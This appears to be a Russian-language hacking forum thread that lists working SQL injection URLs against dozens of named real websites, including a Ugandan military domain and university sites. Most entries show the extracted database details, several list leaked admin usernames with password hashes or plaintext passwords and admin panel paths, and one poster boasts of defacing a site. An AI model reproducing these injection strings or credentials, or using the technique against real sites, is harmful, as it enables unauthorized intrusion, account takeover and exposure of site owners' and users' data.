SQL Инъекции

http://www.administratordebloc.ro/index.php?action=article&ID=-17+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),database(),user()),13--



Database Version: 5.0.67-community
Database name: admbl_admbl
User name: admbl@localhost


http://www.administratordebloc.ro/admin

 

www.whitestrip.ru
Google PR: 5
Yandex CY:130

Code:

http://www.whitestrip.ru/news/view/896+union+select+1,2,concat(version(),0x3a,database(),user()),4,5,6,7,8,9/*/

Версия: 5.0.67
Юзер: [email protected]
Бд: b15581_wstrip

Code:

http://www.whitestrip.ru/news/view/896+union+select+1,2,table_name,4,5,6,7,8,9+from+information_schema.tables/*/

Вывод всех табличек

Code:

http://www.whitestrip.ru/news/view/896+union+select+1,2,column_name,4,5,6,7,8,9+from+information_schema.columns/*/

Вывод всех колонок

Также смотрим на мой мини дефейс)))
www.whitestrip.ru
http://www.whitestrip.ru/pages/dimionx/

 

Code:

http://www.ruscable.ru/board_el/msg-55533+union+select+1,2,3,4,concat_ws(0x15,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16.html

 

Database Version: 5.0.18-standard
Database name: infobase3
User name: www-data@localhost

: 054bea7647c4c9ff : root :
: 027a5ebb761cd005 : mrozek :
: 26978fd16e5c7f8b : www-data :

5.0.22-log
playak@localhost
playak rating

admin:6633c79b2fec1807
pma_aqBG7oMhnKtq:4156e69767be6e91
horde:0e843dda46926377
netpresent:250dbe034105d511
seag:2c07485714a923e2
terrag:765d8db733d31334
rosenberg:1a501a431e40f89f
airsquad:59811f9f5eaf68c3
playak:250dbe034105d511
polls:107b804a16be8687
boatinfo:02f0fcf80f7b4bbc
mambo:70f7ce324f035014
nookie:2aa80ddd11d25b68
fish:4b7be07c38ffcf32
mambo451a:31faef2201fc5b68
kajakvideos:250dbe034105d511
adrian:4bece1e04447a9c9
sugar5:250dbe034105d511

 

upitup.com - PR5

Code:

http://www.upitup.com/roster/artist.php?aid=1000+UNION+SELECT+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8/*

DB_Ver:4.0.27-standard-log
DB_User:[email protected]
DB:Sql18862_1
Таблица с пользователями называется User, интересные поля id,email,username,password
Вытаскиваем одного из админов:

Code:

http://www.upitup.com/roster/artist.php?aid=1000+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,username,password),73),73),3,4,5,6,7,8+from+users+limit+1,1/*

admin:3a21adafbcd3d31a17da15c670615005
или уже расшифрованные
admin : p161c4u
Чтобы попасть в админку логинимся и переходим:

Code:

http://www.upitup.com/controlcenter/

 

Code:

http://www.ultimabg.com/news.php?lang=en&valuta=&id=-1+union+select+concat_ ws(0x3a,version(), database(),user()),2,3,4,5,6--

Database Version : 5.0.67-msl-usrs-icd1-log
Database name : ultimabg_estatemanager
User name : nkemutf5@localhost

----------------------------------------------------#

Code:

http://www.property-bourgas.com/news.php?id=-1+union+select+1,concat_ ws(0x3a, version(),database(),user()),3,4,5,6--

Database Version : 5.0.67-log
Database name : bourgas
User name : bourgas@localhost

берем админов:

Code:

http://www.property-bourgas.com/news.php?id=-1+union+select+1,concat _ws( 0x3a,id,users,passes),3,4,5,6+from+aeg_accounts+limit+0,1--

1:volid:551278
2:admin:aeg1234

----------------------------------------------------#

Code:

http://www.traditzia.bg/bg/news.php?Id=-1'

инфу о бд не даёт просмотреть ... но за-то смотрим админов:

Code:

http://www.traditzia.bg/bg/news.php?Id=-1+union+select+1,concat _ws(0x3a,id,user,pass),3,4,5,6,7+from+ users+limit+0,1--

1:admin:$tradicija
2:tradicia:4tradici@

а тут сама админка:

Code:

http://www.traditzia.bg/ admin/

 

http://www.unarte.ro/unarte/newunarteTST/home.php?l=ro&p=noutati&id=-37+UNION+SELECT+CONCAT_WS(0x3a,version(),database(),user()),2,3,4




Version : 5.0.67-community
Database : unarte_tetenica
User : unarte_siteuna@localhost

 

Code:

http://www.bfu.bg/news/index.php?url=news-detail.php&id=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8--

Database Version : 5.0.67-community-nt
Database name : bfu
User name : [email protected]

---------------------------------------#

Code:

http://www.insurance.bg/news/printnews.php?id=-1+union+select+1,concat_ ws(0x3a,version (),database(),user()),3,4,5,6--

Database Version : 4.0.26-standard-log
Database name :nsurance_main
User name : insurance_local@localhost

смотрим админа:

Code:

http://www.insurance.bg/news/printnews.php?id=-1+union+select+1,concat_ ws(0x3a,id,name,pass),3,4,5,6+ from+users--

1:admin:InsNewsTeam2008

админка:

Code:

http://www.insurance.bg/ admin/login.php

Требует плагин. Нормально заходит под IE.

 

Code:

http://madint.ru/do.php?id=-6+union+select+1/*

 

http://www.credo.md/pagini/masterat.php?limba=rus&id=24%27+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5,6+limit+1,1/*

5.0.24a:test01:test01@localhost

http://www.99.md/index.php?type=sales&id=36+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+limit+1,1

version() 5.0.67
user() 99md@localhost
database() 99md_99md

 

Code:

http://www.artbulgaria.org/news.php?cat=news&id=-1+union+select+1,concat_ ws(0x3a,version(),database( ),user()),3,4,5--

Database Version : 5.0.67-log
Database name : artbulgaria
User name : artbulgaria@localhost

смотрим админа:

Code:

http://www.artbulgaria.org/newsid.php?cat=news&=-1+union+select+1,concat_ws(0x3a,id,user_name,user_password),3,4,5+from+artbulgaria _users+limit+0,1--

-----------------------------------------#

Все Болгария надоела ... перехожу на Италию

Code:

http://www.iltuffetto.it/news.php?id=4+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5,6--

Database Version : 5.0.51a-log
Database name : 372186_iltuffetto
User name : [email protected]

админ:

Code:

http://www.iltuffetto.it/news.php?id=4+union+select+1,2,concat _ws(0x3a,id,username,passsword),4,5,6+from+utenti+limit+0,1--

3:Andrea:lokos

админка:

Code:

http://www.iltuffetto.it/ admin/login.php

 

http://www.moldovajob.md/showvacancy.php?id=19613/**/union/**/select/**/1,22,23,concaT(version(),0x3a,database(),0x3a,user()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/**/limit/**/1,1/*

version() 5.0.45
database() moldovaj_newjoblist
user() moldovaj_alexdio@localhost

http://www.poynting.co.za/pressnews.php?id=-19+union+select+1,2,3,4,5,6+limit+1,1/*

version() 5.0.24-standard
database() poynting
user() [email protected]

http://www.poynting.co.za/pressnews.php?id=-19+union+select+1,2,3,concat(id,0x3a,username,0x3a,pass),5,6+from+users+limit+1,1/*

http://www.defenceuganda.mil.ug/details.php?item=-34+union+select+1,2,concaT(version(),0x3a,database(),0x3a,user()),4,5,6+from+users+limit+1,3/*

4.0.27-max-log:defense:[email protected]

http://www.defenceuganda.mil.ug/details.php?item=-34+union+select+1,concat(0x3a,id,0x3a,username,0x3a,password),3,4,5,6+from+users+limit+1,3/*

http://uamp.wits.ac.za/sebs/staff_individual.php?id=239+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(version(),0x3a,database(),0x3a,user()),14,15,16,17,18,19,20+limit+1,1/*

5.0.45-log:sebs:sebsadmin@localhost
___
http://www.bayworld.co.za/press.php?id=-81+union+select+1,2,3,4,5,6/*

5.0.32-Debian_7etch1-log:bayworld:bayworld@localhost
___
http://www.healthspas.co.za/spa-bookings.php?Id=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/*

5.0.32-Debian_7etch8:healthsp_health:healthspad@localhost

 

Code:

http://www.omnetpp.org/filemgmt/singlefile.php?lid=-133+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16/*

Code:

http://www.omnetpp.org/filemgmt/singlefile.php?lid=-133+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+limit+85,1/*

gl_users

Code:

http://www.omnetpp.org/filemgmt/singlefile.php?lid=-133+union+select+1,2,passwd,4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1/*

Code:

http://www.omnetpp.org/filemgmt/singlefile.php?lid=-133+union+select+1,2,username,4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1/*

Anonymous:tompika

гг, помогло)

PR 6

 

Обои на рабочий стол.

Code:

http://desktopauto.org/unsorted/-38+union+select+1,2,3,version(),5.htm

 

www.enwell.net PageRank: 6

HTML:

http://www.enwell.net/flash/topic.php?topicid=-1+union+select+1,2,3,4,5,concat_ws(0x3A,user(),@@version,database()),7,8,9,10+--+

www.tms-media.co.uk PageRank: 5

HTML:

http://www.tms-media.co.uk/news/info.php?item=Cairo-office-unveiled&refnum=-76+union+select+1,concat_ws(0x3A,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+

 

http://www.fabricademagie.ro/index.php?sectiune=produse&produs=-205+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--&categ_id=1




Database Version: 4.1.22-standard-log
Database name: fabricad_fabricademagie
User name: fabricad_axiomat@localhost

 

Code:

http://sevleshoz.com/news.php?id=-8+union+select+1,2,concat_ws(version(),user(),database())--

версия/юзер/бд:

Code:

[email protected]_data

---------------------------------------------
The End!

 

Code:

http://www.enerpoint.it/news/news_show.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat _ws(0x3a,version(),database(),user( )),10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+mysql.user+limit+0,1--

Database Version : 5.0.32-Debian_7etch6-log
Database name : enerpoint
User name : solar@localhost

берем админа :

Code:

http://www.enerpoint.it/news/news_show.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat _ws(0x3a,user,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+mysql. user+limit+0,1--

 

http://www.ci.uchicago.edu/events/detail.php?id=17%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
Version 4.0.24
Database clsweb
User [email protected]

http://www.sahovski.com/products/ci/latest.php?id=344+union+select+1,2,3,4,5,6,concat( version(),0x3a,database(),0x3a,user()),8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32+limit+1,1/*

5.0.26:sahovski_co_yu_-_sahovski:sahovski@localhost

http://www.sahovski.com/products/ci/latest.php?id=344+union+select+1,2,3,4,5,6,concat( id,0x3a,user,0x3a,password),8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 +from+admin+limit+1,1/*

http://www.ci-outreach.org/news.php?id=16+union+select+1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17+limit+1,1

5.0.67-log:eotevents:[email protected]

 

Code:

http://vemas.com.ua/index.php?lang_id=1&menu_id=-1+union+select+concat_ws(0x3a,user(),database(),version())/*

user:database:version
[email protected]:vemas:4.1.25-log

Code:

http://www.ommadawn.dk/design2.php?fkt=side&id=8+union+select+1,concat_ws(0x3a,user(),database(),version())/*&snak=

user:database:version
[email protected]:a0001700_innodb1:4.0.27-standard